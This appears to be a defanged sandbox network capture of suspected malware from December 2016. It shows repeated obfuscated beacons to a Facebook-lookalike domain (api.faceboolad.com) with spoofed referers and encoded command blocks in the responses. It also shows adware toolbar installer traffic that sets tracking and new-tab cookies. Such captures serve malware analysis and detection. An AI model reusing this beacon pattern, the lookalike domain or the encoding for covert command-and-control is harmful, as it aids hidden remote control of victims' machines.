Server-Key: PYac2j1v9X7GItfdSTnWueJHLmUl5gQCk4OxBhqrME3Dwp6FzVKo0RNi8bsyZA

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 02 Dec 2016 18:04:39 GMT

[CODE]PYac2j1v9X7GItfdSTnWueJHLmUl5gQgXlXyXUXVYlX3XlXSXlX3XlXTXlXVYlXy
XUXsXUXmXUXoXUXyXUXiYlXKXlXVYlXVYlXSXlXfXlXKXlXyXUXsXUXyXUXTXlXzXlXRXl
XSXlX3XlXKXlXRYUXjXlXAXlXiYlXzXlXTXlX3XlXKXlXeXlXNYlXmXlX1XlXAXlXRYUXX
XlXSXlXVYlX3XlXRYUX3XlXKYlXiYlXKXlXRYUXVYlXTXlXjXlXjXlXKXlXVYlXVYlXwXU
XyXUXWXHXCk4OxBhqrME3Dwp6FzVKo0RNi8bsyZA[CODE]HTTP/1.1 200 OK..Cache-C
ontrol: no-cache..Pragma: no-cache..Content-Length: 326..Content-Type:
 text/plain; charset=gb2312..Expires: -1..Server: Microsoft-IIS/8.5..S
erver-Key: PYac2j1v9X7GItfdSTnWueJHLmUl5gQCk4OxBhqrME3Dwp6FzVKo0RNi8bs
yZA..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Fri, 02
 Dec 2016 18:04:39 GMT..[CODE]PYac2j1v9X7GItfdSTnWueJHLmUl5gQgXlXyXUXV
YlX3XlXSXlX3XlXTXlXVYlXyXUXsXUXmXUXoXUXyXUXiYlXKXlXVYlXVYlXSXlXfXlXKXl
XyXUXsXUXyXUXTXlXzXlXRXlXSXlX3XlXKXlXRYUXjXlXAXlXiYlXzXlXTXlX3XlXKXlXe
XlXNYlXmXlX1XlXAXlXRYUXXXlXSXlXVYlX3XlXRYUX3XlXKYlXiYlXKXlXRYUXVYlXTXl
XjXlXjXlXKXlXVYlXVYlXwXUXyXUXWXHXCk4OxBhqrME3Dwp6FzVKo0RNi8bsyZA[CODE]
....

GET /api//send HTTP/1.1

Connection: Keep-Alive

Accept: */*

Referer: hXXp://VVV.facebook.com

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Server: 0pkt4pgpOpLpkt1tktspPpotbpjtjtMtgtStMtWtWtQtMtgtWtjt0tspot7pgtMtJt5totMtotgtWt7p5t5tStBtspkt9tkt1prpMpLpkt1tBt9tktSpLpjpkt1tktepcp9pOpgpWpBpitJtitZp5p1pcpopNp1pLpitspOpcp1pcpgp9pitqpLpjpSpcp4pLpitTpNp4pIpitBtitXpQtMtit8ttpEpcp5pOp1tJtMtjtBtItkt9tktipjpgpWpBpLpjpkt1tktkt9tktEpBpLpjpkt1tktkt9tktMpNpBpBpkt1tktkt9tkt4pgpgpIpcpLpBpkt1tktkt9tktNpcpOpkt1tjt9tktEp1prpMpLpkt1tjtPm

Server-Key: vzPtbVd7sa3p6DxAUfqmGTeKZRCul2hHFk4iNYwyLOI8cng9o5BjJMWSE10QrX

Host: api.faceboolad.com


HTTP/1.1 200 OK

Cache-Control: no-cache

Pragma: no-cache

Content-Length: 326

Content-Type: text/plain; charset=gb2312

Expires: -1

Server: Microsoft-IIS/8.5

Server-Key: Y7p9jLgIiT126swx50Sq8XDmbnRuok3W4dHhEGcaVveMFJtCNrOBUzylQKfZPA

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 02 Dec 2016 18:04:49 GMT

[CODE]Y7p9jLgIiT126swx50Sq8XDmbnRuok3qTmTMTy7DTmTCTmT2TmTCTmTfTmTDTmTM
Ty7kTy7zTy7sTy7MTy7lTmTETmTDTmTDTmT2TmTnTmTETmTMTy7kTy7MTy7fTmTLTmTHTm
T2TmTCTmTETmTaTy7gTmT0TmTlTmTLTmTfTmTCTmTETmTATmTN7mTzTmTKTmT0TmTaTy7j
TmT2TmTDTmTCTmTaTy7CTmTcTmTlTmTETmTaTy7DTmTfTmTgTmTgTmTETmTDTmTDTmTz7y
7MTy7RTr7W4dHhEGcaVveMFJtCNrOBUzylQKfZPA[CODE]HTTP/1.1 200 OK..Cache-C
ontrol: no-cache..Pragma: no-cache..Content-Length: 326..Content-Type:
 text/plain; charset=gb2312..Expires: -1..Server: Microsoft-IIS/8.5..S
erver-Key: Y7p9jLgIiT126swx50Sq8XDmbnRuok3W4dHhEGcaVveMFJtCNrOBUzylQKf
ZPA..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Fri, 02
 Dec 2016 18:04:49 GMT..[CODE]Y7p9jLgIiT126swx50Sq8XDmbnRuok3qTmTMTy7D
TmTCTmT2TmTCTmTfTmTDTmTMTy7kTy7zTy7sTy7MTy7lTmTETmTDTmTDTmT2TmTnTmTETm
TMTy7kTy7MTy7fTmTLTmTHTmT2TmTCTmTETmTaTy7gTmT0TmTlTmTLTmTfTmTCTmTETmTA
TmTN7mTzTmTKTmT0TmTaTy7jTmT2TmTDTmTCTmTaTy7CTmTcTmTlTmTETmTaTy7DTmTfTm
TgTmTgTmTETmTDTmTDTmTz7y7MTy7RTr7W4dHhEGcaVveMFJtCNrOBUzylQKfZPA[CODE]
....

GET /api//send HTTP/1.1

Connection: Keep-Alive

Accept: */*

Referer: hXXp://VVV.facebook.com

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Server: nSyihLDL0LELyiYLyinLjL1iWLIiIilihiviliViViJilihiViIiQinL1iiLhiliUiai1ili1ihiViiLaiaivikinLyi4iyilLBSaLELyiYLki4iyiILELeLyiYLyi7LZLxL0LDLkLKLmiUimi5LCLlLZL9LFLlLELminL0LZLlLZLDLxLmiALELeLILZLhLELmizLFLhLVLmikimiYSJilimixiRLULZLCL0LYLUiliIikiDiyi4iyi4LeLDLkLKLELeLyiYLyiyi4iyiULKLELeLyiYLyiyi4iyiaLFLKLKLyiYLyiyi4iyihLDLDLVLZLELKLyiYLyiyi4iyiFLZL0LyiYLIi4iyiULlLBSaLELyiYLIiML

Server-Key: YBqniPcWRjX8Ldw2obg5S7zGfAHOpu6N3s0EmtyF4hC9xDTZvVlUIka1eKrMJQ

Host: api.faceboolad.com


HTTP/1.1 200 OK

Cache-Control: no-cache

Pragma: no-cache

Content-Length: 326

Content-Type: text/plain; charset=gb2312

Expires: -1

Server: Microsoft-IIS/8.5

Server-Key: qsHI325SKLTZUPRdMCNlWxuvEbi8tnkG4FfY1X69r7jQhJBpeayoc0zwmDOgVA

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 02 Dec 2016 18:04:59 GMT

[CODE]qsHI325SKLTZUPRdMCNlWxuvEbi8tnkdUxUy3w3HUlUsWlUA3lUsWlUJUlUHUlUy
3w3wUlU7Uw3mUw3y3w3vUlUGUlUHUlUHUlUA3lUkUlUGUlUy3w3wUlUy3w3JUlUHWlU1Ul
UA3lUsWlUGUlU03w3o3lUMUlUvUlUHWlUJUlUsWlUGUlUQUlUfUlUBUlU03lUMUlU03w3e
UlUA3lUHUlUsWlU03w3sWlUzUlUvUlUGUlU03w3HUlUJUlUo3lUo3lUGUlUHUlUHUlUkUw
3y3w3XUlUG4FfY1X69r7jQhJBpeayoc0zwmDOgVA[CODE]HTTP/1.1 200 OK..Cache-C
ontrol: no-cache..Pragma: no-cache..Content-Length: 326..Content-Type:
 text/plain; charset=gb2312..Expires: -1..Server: Microsoft-IIS/8.5..S
erver-Key: qsHI325SKLTZUPRdMCNlWxuvEbi8tnkG4FfY1X69r7jQhJBpeayoc0zwmDO
gVA..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Fri, 02
 Dec 2016 18:04:59 GMT..[CODE]qsHI325SKLTZUPRdMCNlWxuvEbi8tnkdUxUy3w3H
UlUsWlUA3lUsWlUJUlUHUlUy3w3wUlU7Uw3mUw3y3w3vUlUGUlUHUlUHUlUA3lUkUlUGUl
Uy3w3wUlUy3w3JUlUHWlU1UlUA3lUsWlUGUlU03w3o3lUMUlUvUlUHWlUJUlUsWlUGUlUQ
UlUfUlUBUlU03lUMUlU03w3eUlUA3lUHUlUsWlU03w3sWlUzUlUvUlUGUlU03w3HUlUJUl
Uo3lUo3lUGUlUHUlUHUlUkUw3y3w3XUlUG4FfY1X69r7jQhJBpeayoc0zwmDOgVA[CODE]
....

GET /api//send HTTP/1.1

Connection: Keep-Alive

Accept: */*

Referer: hXXp://VVV.facebook.com

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Server: hwdpfsCs4sKsdp0sdphs3sjpQsUpUpApfpcpApSpSp1pApfpSpUpxphsjppsfpApMpzpjpApjpfpSppszpzpcpqphsdpapdpAsOwzsKsdp0sqpapdpUsKsesdp0sdpgsTsVs4sCsqsrsHpMpHpvsysAsTsWsNsAsKsHphs4sTsAsTsCsVsHpLsKsesUsTsfsKsHpXsNsfsSsHpqpHp0w1pApHpVplsMsTsys4s0sMpApUpqpCpdpapdpasesCsqsrsKsesdp0sdpdpapdpMsrsKsesdp0sdpdpapdpzsNsrsrsdp0sdpdpapdpfsCsCsSsTsKsrsdp0sdpdpapdpNsTs4sdp0sUpapdpMsAsOwzsKsdp0sUpGs

Server-Key: 0Othpb6Ql3DBskiRZ7PvwgX2uLEImn5JF84KH9dNafyWVCYTcSAMUqzjeroG1x

Host: api.faceboolad.com


HTTP/1.1 200 OK

Cache-Control: no-cache

Pragma: no-cache

Content-Length: 326

Content-Type: text/plain; charset=gb2312

Expires: -1

Server: Microsoft-IIS/8.5

Server-Key: nvg1jqpxY9R3SDr6UytIiK4dXaFVez5WmZchb8sTMQEB2JuNflLCGo70OHPkwA

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Fri, 02 Dec 2016 18:05:09 GMT

[CODE]nvg1jqpxY9R3SDr6UytIiK4dXaFVez5K3f1V3L1y3f1D3f1h3f1D3f1r3f1y3f1V
3L1D3L1g3L163L1V3L1T3f1U3f1y3f1y3f1h3f1L3f1U3f1V3L1D3L1V3L1r3f1u3f1i3f
1h3f1D3f1U3f1J3L1c3f1O3f1T3f1u3f1r3f1D3f1U3f1g3f1t3f163f1a3f1O3f1J3L1l
3f1h3f1y3f1D3f1J3L1D3f1l1f1T3f1U3f1J3L1y3f1r3f1c3f1c3f1U3f1y3f1y3f1c3L
1V3L1s3S3WmZchb8sTMQEB2JuNflLCGo70OHPkwA[CODE]HTTP/1.1 200 OK..Cache-C
ontrol: no-cache..Pragma: no-cache..Content-Length: 326..Content-Type:
 text/plain; charset=gb2312..Expires: -1..Server: Microsoft-IIS/8.5..S
erver-Key: nvg1jqpxY9R3SDr6UytIiK4dXaFVez5WmZchb8sTMQEB2JuNflLCGo70OHP
kwA..X-AspNet-Version: 4.0.30319..X-Powered-By: ASP.NET..Date: Fri, 02
 Dec 2016 18:05:09 GMT..[CODE]nvg1jqpxY9R3SDr6UytIiK4dXaFVez5K3f1V3L1y
3f1D3f1h3f1D3f1r3f1y3f1V3L1D3L1g3L163L1V3L1T3f1U3f1y3f1y3f1h3f1L3f1U3f
1V3L1D3L1V3L1r3f1u3f1i3f1h3f1D3f1U3f1J3L1c3f1O3f1T3f1u3f1r3f1D3f1U3f1g
3f1t3f163f1a3f1O3f1J3L1l3f1h3f1y3f1D3f1J3L1D3f1l1f1T3f1U3f1J3L1y3f1r3f
1c3f1c3f1U3f1y3f1y3f1c3L1V3L1s3S3WmZchb8sTMQEB2JuNflLC..

GET /images/download/spokesperson/html5/audio/spokesperson.js HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ak.imgfarm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Wed, 10 Aug 2016 20:37:05 GMT

ETag: "8c0e4d-836b-539bd9cc03e40"

Accept-Ranges: bytes

Content-Length: 33643

Cache-Control: max-age=315290129

Expires: Sat, 08 Aug 2026 20:37:05 GMT

Content-Type: application/javascript

Date: Fri, 02 Dec 2016 18:04:34 GMT

Connection: keep-alive
(function () {..    function isIE() {..        var myNav = navigator.u
serAgent.toLowerCase();..        return (myNav.indexOf('msie') != -1) 
? parseInt(myNav.split('msie')[1]) : false;..    }..    var spokespers
on_height;..    if (isIE() && isIE() < 9) {..        return;..    }
..    else if (isIE())..    {..        var spokesperson_pos_bottom = "
-4";..        spokesperson_height = "47";..    }..    var spDiv = docu
ment.createElement("div");..    spDiv.id = "wthvideo";..    var h264Fa
llback = document.createElement("h264Fallback");..    h264Fallback.id 
= "h264Fallback";..    var videoBox = document.createElement("video");
..    videoBox.id = "videoBox";..    h264Fallback.appendChild(videoBox
);..    spDiv.appendChild(h264Fallback);..    var wthbody = document.b
ody || document.getElementsByTagName("body")[0];..    wthbody.appendCh
ild(spDiv);..// Copyright 2015 Website Talking Heads..// JavaScript Do
cument..    if (typeof(spokesperson_pathname) === 'undefined') {..    
    var spokesperson_pathname = "hXXp://imgfarm.com/images/download/sp
okesperson/html5/audio/files";..    }..    if (typeof(spokesperson_fil
ename) === 'undefined') {..        var spokesperson_filename = "v3_spo
kesperson";..    }..    if (typeof(spokesperson_imgname) === 'undefine
d') {..        var spokesperson_imgname = "blank";..    }..    if (typ
eof(spokesperson_autoplay) === 'undefined') {..        var spokesperso
n_autoplay = "yes";..    }..    if (typeof(spokesperson_audioonly) ===
 'undefined') {..        var spokesperson_audioonly = "yes";..    <<< skipped >>>

GET /images/anx/anemone-1.2.7.js HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: akz.imgfarm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7k

Last-Modified: Mon, 08 Jul 2013 20:02:48 GMT

ETag: "774114-a236-874e8a00"

Accept-Ranges: bytes

Content-Type: application/x-javascript

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 11189

Cache-Control: max-age=207971871

Expires: Thu, 06 Jul 2023 20:02:25 GMT

Date: Fri, 02 Dec 2016 18:04:34 GMT

Connection: keep-alive
...........}mw.F..g.9..X.....eIN...n...u.I..I{......$...p(.....?......
t.>."qf0....`0..a..r.%q.M.YV..|...H.e...W.RD....yt.W.MV/.z.F.2.....
G.t9I .u.<..*..U..E........h]d...;.V..=Z....Y..._......IYM.........
D.,ZfB@7}.....".....t.uJ=.........$.........U.....D.R.E......BK...:...
.,.......}O.z....LqX-@.M..q]..U..%.`Z&.%....._..l..S.:/.?....,.9F0u.N.
Q.'.h...k(. ')V....[.....)..6..^.9............l*[.3...&.n2.hs..M...6..
.."....Ed7!..sN.*..0KU....>.BR.WY..KX.{.q..7....*b7...1...:.ey.h...
...2.C4..z...I......G"......Y..%M.J~'i1-.q.D.a..Q......T@7.."n8.@...-W
.z..r&...5.....I......Vt.b .'qr..'....D.....|X..|.&E.i<U......i}.ZI
.r...EB .f...Ti...2 ......</..UU......uqH._....k..Dj......>H....
S...D...l.Ga.O...%..E........\.....vL..}.....t....S.$..&....f.b.Y.....
".F..R?Z....X...r5......R....d..0.7..5.).X...,I..5.. .n..X@!h.Mw.T...l
.*..N...:.26.!.=....-.[-J.5nQH.eV.k.{<......EM.4M.r...u........:...
..#)'......x...U..G)...E.k....isbP.;..s[Mx..x...y.3P....0ThZ... .....m
.pQF..v!..P..*0YV..."..E........|g.)P.. 8".#.....]....pK.'. .uBJ.am?..
(......c......92.../%...........6...u.Q..".a>}]<#1.t.......R...^
.$ b......n.?..7..8.{P.n....d...aS%...#...$.....f.`...F.W.%l5..U..T$U.
Z..1.a.S.?..h...={.,z....{.r..Pa... .@{<.M.I=....Y..4]...P.[...r...
.........F.u!..i.....?........R@._.O...{....w.....F.x......k.mO.....nt
...[tM...........Y.;C.........&T....3...;..tG\..J.....H...".......,..f
@H?...:!.. O.9.:>.~. ..`..aL..7.......L....8..K..k{8..e.I..Wv7....O
u.|>`"w...a.u{'..a...v...Qv..|.mm(3.... ..1L.....Qn.).T9L.~..]l<<< skipped >>>

GET /images/vicinio/dsp-images/jeremy.jacinto/background/1471015123308.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ak.imgfarm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Fri, 12 Aug 2016 15:18:44 GMT

ETag: "8721c4-530-539e165ed0c5d"

Accept-Ranges: bytes

Content-Length: 1328

Cache-Control: max-age=305673249

Expires: Mon, 10 Aug 2026 15:18:44 GMT

Content-Type: image/png

Date: Fri, 02 Dec 2016 18:04:34 GMT

Connection: keep-alive
.PNG........IHDR.......A.....S.cY....tEXtSoftware.Adobe ImageReadyq.e&
lt;...&iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1
.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http:/
/ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photo
shop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:C9177305609C11E69F65
9152BDA6B005" xmpMM:DocumentID="xmp.did:C9177306609C11E69F659152BDA6B0
05"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C9177303609C11
E69F659152BDA6B005" stRef:documentID="xmp.did:C9177304609C11E69F659152
BDA6B005"/> </rdf:Description> </rdf:RDF> </x:xmpmet
a> <?xpacket end="r"?>^.......IDATx..W[r. .C..P..C...P7K.._.L
...1................"..7...$..l4....&.}#...*......O.....!u...*c.....^.
..W.m...Kb76.. .8.9 .....Ÿ..NU......$.......0VI~...\..Q*.....W..@.5.
..Ku....xZ.........-..9...Tv.h.Gz.J...a.~o.W.._.j.....8.Wx4.K7..8..F..
...Z...A.:.....x.aPo.D.5.L@"N.......^.Y ...t.w...40W....T.......n....b
*.\.....]W.2k.....9.~8......5.S..7...>w.n..C.:...._.z..^8..X.m...}.
%...I[...(...0.[ez...X.`.B...Tt...W....|.vw..n....IEND.B`...<<< skipped >>>

GET /prd/ttdetectUtil.js HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ttdetect.staticimgfarm.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Apache

Last-Modified: Wed, 17 Aug 2016 14:30:22 GMT

ETag: "3f18a9-53ea-53a454e3136a3"

Accept-Ranges: bytes

Content-Type: application/javascript

Vary: Accept-Encoding

Content-Encoding: gzip

Cache-Control: max-age=22856521

Expires: Thu, 24 Aug 2017 07:06:35 GMT

Date: Fri, 02 Dec 2016 18:04:34 GMT

Content-Length: 7730

Connection: keep-alive
...........\{s.F.....5...pD...........?..d.(.....D.4.ZRH.g....0.A)....
J...3.......(.......vk.....l........7.c/.\{..b.%....;aC.w.wW...N.i....
.\o!..7/^%...C^..2/.......A&W...VU_S.C~u..'..p..l.&`y.....Q..d........
5.[l...}.?r..i .........c....A..a...........O..`....".......Gb..x,<
.&...?...c.z../j.....(.:p....X./.J.w4.}.v...w.......m9....\.....W...1U
&..'..2._.IL...!..@.....^....0Gw...s.A..Kv..:.m..5...6.E..O.>...gS.
..8.....S....*K...Uqi..V.[...0....j!.y.q_...#......O..@F../.....B1.)..
..Mg....."a}$o>.L..b\..}.OQ.AS6eu.fc..6".r..#..q.JmE02....k.l.'..0[
.j.X......j.G.bh`.-"...q.P$m{,.....A/...zG#7.{.......[$=1...g.........
....mZ....sW..Q....B6.C...ra*..........mh...............nf.=...ZF..4)"
..u.!.0T.}lU.L.YN5N{.8Y..... .4.T..3..x..A.[..:...O...C{....=&.w#...kT
.........).....u.^.G............J.....o.rN/....{x.e.......pv6...Nzq..n
p..Qxq....~.... U.T....a..CC.....=...R...>....cF...dA`.'PxA.....A.w
H62e......H7..~q.....Z...4..T*.J...|..7..`...Q.....).=....QC..Xi6.q.._
..Pj.J..$.K..eZO.v.e.u/....Y....rY.`P-..6........n.f.,..^.= .M...5.*3.
.\....5.....ze.....>.Ty.N.. .$.4....i...GB....)p......[.XM....-...v
...".6..ls...... .U.....TX.......DH6?.mz1..fw..............8S..3/L.b.]
O..?..............'...l...O....l[dk..]..-*....".......[{.....i..t.5...
...A....... ..bj....m.Nz.B......H}.....".L..(..;........6)..S.I..l..2.
4.b.......X.J..9e..o.G...Wl.xg.\%.55..k..V....W.\.Q...1.3@M..1.......!
J..k..........C`...6=.9....!.@.?*......".3.X..$.;..^#@...v....9Y......
..,......L...W...2A3.....0>..`.._p.rz6.m..GOKM^d..@..=...*..6..<<< skipped >>>

POST /mirrorCookies.jhtml HTTP/1.1

Accept: text/html, application/xhtml xml, */*

Referer: hXXp://free.mytransitguide.com/index.jhtml

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: mytransitguide.dl.myway.com

Content-Length: 2662

Connection: Keep-Alive

Cache-Control: no-cache

sessionData=,,-1,false,1,"tC7XLVSg6z8g3PZQ8L1Jd7fYEV2N1Od43W0W2RmzENs90yXvipTK/j6TFxTk4dSwxuQWljAedxSdh+SiFsGi4NGkw7ePy/oKNZPpTwCEs+b5J8v4vQNQAIBJnfgkI3VA8ma4lcy73mKk0zCUnT5j3xAyen01861pGjJfsj7wJsIS5sSUDVupjcLu0fmBSNV7wTkVYREC9dxMh2JJy7R8kUpkvjkpFtTzx+RZ3yRmlYHqIJ8RUlF9k66cs0CudhqnVcfEXBQpHWubmnxYYDfkefW9etXDGC22DDTnPABoMzirKR5lJXoi5GkVNB0WgpxP0Lrx0UlU16ZniRYz4x3T1VwEMrx8/f6hx2NkYJjTM5v6pXjQj/QeARDu9CfbCDfl4AEJlv14SkQJQDfVh8qUp6yMCGSXuwer1LwhJ7fT0zB+un+Q0pVP143IktpAu6hxXnI/oSHR/4/BDyVcYQNp/uvxY/vPi7KN5bcELSXeSzAjqpstOzn+VyJ0cskApa8AzMG4eDMTml5K5/EZX3SN5to3Cx513fYxAToKTZPvE/73UHYHL6DATK8pbMMD8TZb46Or3Z8H4W6YT3nou4SGRX6qJX9GhJF7IwhgPFNKRjz+/U6lPtw91tFIih3TbVBvnx27hlDtlTwkSbYtHQXGOyTIo0ko9I2APDWAaO8mfjSOLhViGox5S3B5hXNlxj1HPzIQUObYdEowJEvoe78dm7HpDRuNRtCS2oe4ZM8tbT4OVjdsS2047hFayjsAnWG1c8n/fmFjfJ23qPOYbHFP3g=="&language=,,-1,false,1,en&partnerId=,,-1,false,1,^BNH^orgyyy^S18590^ua&installDate=,,-1,false,1,2016120208&ttabFirstInstall=,,-1,false,1,true&coId=,,-1,false,1,3121b0a55fdb406
HTTP/1.1 200 OK

Date: Fri, 02 Dec 2016 18:04:34 GMT

Server: Apache-Coyote/1.1

Access-Control-Allow-Origin: hXXp://free.mytransitguide.com

Access-Control-Allow-Methods: GET, POST

Access-Control-Max-Age: 1000

X-XSS-Protection: 0

P3P: CP='CURa ADMa DEVa PSA PSD OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'

Content-Encoding: gzip

Vary: Accept-Encoding

Content-Type: text/html

Set-Cookie: sessionData="tC7XLVSg6z8g3PZQ8L1Jd7fYEV2N1Od43W0W2RmzENs90yXvipTK/j6TFxTk4dSwxuQWljAedxSdh SiFsGi4NGkw7ePy/oKNZPpTwCEs b5J8v4vQNQAIBJnfgkI3VA8ma4lcy73mKk0zCUnT5j3xAyen01861pGjJfsj7wJsIS5sSUDVupjcLu0fmBSNV7wTkVYREC9dxMh2JJy7R8kUpkvjkpFtTzx RZ3yRmlYHqIJ8RUlF9k66cs0CudhqnVcfEXBQpHWubmnxYYDfkefW9etXDGC22DDTnPABoMzirKR5lJXoi5GkVNB0WgpxP0Lrx0UlU16ZniRYz4x3T1VwEMrx8/f6hx2NkYJjTM5v6pXjQj/QeARDu9CfbCDfl4AEJlv14SkQJQDfVh8qUp6yMCGSXuwer1LwhJ7fT0zB un Q0pVP143IktpAu6hxXnI/oSHR/4/BDyVcYQNp/uvxY/vPi7KN5bcELSXeSzAjqpstOzn VyJ0cskApa8AzMG4eDMTml5K5/EZX3SN5to3Cx513fYxAToKTZPvE/73UHYHL6DATK8pbMMD8TZb46Or3Z8H4W6YT3nou4SGRX6qJX9GhJF7IwhgPFNKRjz /U6lPtw91tFIih3TbVBvnx27hlDtlTwkSbYtHQXGOyTIo0ko9I2APDWAaO8mfjSOLhViGox5S3B5hXNlxj1HPzIQUObYdEowJEvoe78dm7HpDRuNRtCS2oe4ZM8tbT4OVjdsS2047hFayjsAnWG1c8n/fmFjfJ23qPOYbHFP3g=="; Version=1; Domain=mytransitguide.dl.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: language=en; Version=1; Domain=mytransitguide.dl.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: partnerId=^BNH^orgyyy^S18590^ua; Version=1; Domain=mytransitguide.dl.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: installDate=2016120208; Version=1; Domain=mytransitguide.dl.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: ttabFirstInstall=true; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: coId=3121b0a55fdb4060b313a5cb88f90289; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: npsSurveyUrl=""; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: toolbarId=75357AF2-6820-49C9-86BD-ECF27652C299; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: partnerSubId=""; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: dlput=S18590; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: installType=MSNI; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: successUrl="hXXp://free.mytransitguide.com/installComplete.jhtml"; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: chromeShowToolbar=nowhere; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: ChromeExtensionCopies=stubby; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: newTabURL="hXXp://hp.myway.com/mytransitguide/s18590/index.html?n=780BD6C7&"; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: newTabCache=false; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: newTabBubbleURL="hXXp://free.mytransitguide.com/chromeInstruct.jhtml?tabView=bubble"; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: newTabInstructURL="hXXp://free.mytransitguide.com/chromeInstruct.jhtml?tabView=instruct"; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: newTabSuccessURL="hXXp://free.mytransitguide.com/chromeInstruct.jhtml?tabView=success"; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: pixelUrl="hXXp://free.mytransitguide.com/install_pixels.jhtml?partner=^BNH^orgyyy^S18590^ua&coId=3121b0a55fdb4060b313a5cb88f90289&tbGuid=[TBUID]"; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: defaultSearchOption=false; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

Set-Cookie: defaultSearch=false; Version=1; Domain=.myway.com; Max-Age=2592000; Expires=Sun, 01-Jan-2017 18:04:34 GMT; Path=/

